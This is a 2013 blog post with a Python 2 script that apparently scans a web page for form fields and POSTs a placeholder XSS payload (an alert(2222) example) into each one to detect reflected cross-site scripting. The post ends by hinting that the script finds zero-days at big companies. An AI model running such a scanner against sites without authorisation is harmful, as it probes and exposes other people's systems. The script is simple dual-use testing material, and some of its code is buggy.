Wednesday 20 March 2013

[EN] Modules in your own webscanner - XSS over POST

This is another example of how python can be used to build (maybe simple but) useful
webapp scanner. This part (called 'module') can be used to figureout where in tested page we
will have a possibility of XSS vulnerablity (via HTTP POST).

It could be a good exercise to connect all of those 'modules' to build 'one code'
to test all vulnerabilities.

To start, create a file named try_POST_xss.py. (Like before, we will need chmod u+x for this file.)
Source code you can find below:

#!/usr/bin/env python
# ----
# try_POST_xss.py
# ----
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separetly with 'payload'.

# enjoy.

import urllib
import urllib2
import re
import sys
import httplib

host = sys.argv[1]
path_file = sys.argv[2]
url = host+':80'

url_file = url+path_file

payload = 'your<xss<code<here' # for example script+alert(2222) - see below ;)
# if you want I have version 'payloads-from-file' too.

print 'Target: ',host
print 'Vuln file: ',path_file
print 'Full URL to attack:' ,url_file
print

# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' ('to find') string.
get_connect = urllib.urlopen('http://'+url_file)
get_response = get_connect.read()
status = get_connect.getcode()

print 'Status of requested page: ',status

# what we're looking for:
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(" name=\"([^\"]+)\"",get_response)

#############################################################
# hm ;] one idea to test right now. ;D
poc = open('poc_file_for_POST_xss.html','w')

#############################################################

# func to send POST to target url+found parameter
def do_post_now(url):
  params = urllib.urlencode ( { results[i] : payload } )
  headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
  connect = httplib.HTTPConnection(url)
  connect.request('POST', path_file, params, headers)
  response = connect.getresponse()
  print response.status, response.reason # 200 OK?
  data = response.read()
  connect.close() # end of test this parameter at this URL
  y=0
  line = data.find('2222')
  if line != -1:
    print '\t[+- (  POST XSS alert!  ) -+]'
    print '\t [+] Found POST XSS in line:' ,line
    print data[y]
    print poc.writelines(data)
   # poc.close() # write&save simple p0c file. ;7
   # lookout here, because in some cases .close() method will generate an error.
   # that's why it's #commented here.
    y=y+1
  
# end of do_post_now(url)
# ---

# MAIN:
if len(sys.argv) < 2:
  sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
  sys.exit(1)
else:

  # if result found:
  if (len(results)>0):
    print '-------------------------------------------------------------'
    print 'Got some results :) Now we can try to exploit parameters.\n'

    i = 0 # next in list
    while i < len(results):
      print 'Found param called: ',results[i]
  
      print 'Do POST now, for URL: ', url, ' with param: ', results[i]
      # here we'll create a POST for found parameter
      do_post_now(url)
      # end of this POST for this parameter

    # and next line:
      i=i+1
    # end of while i loop


# EOF.
# ----

Interesting thing here is that you will find 0days vulnerabilities at big companies.
Trust me. ;)

And - as always - feedback is welcome.

(* full code you will find also here.)
Enjoy! ;)

No comments:

Post a Comment

What do You think...?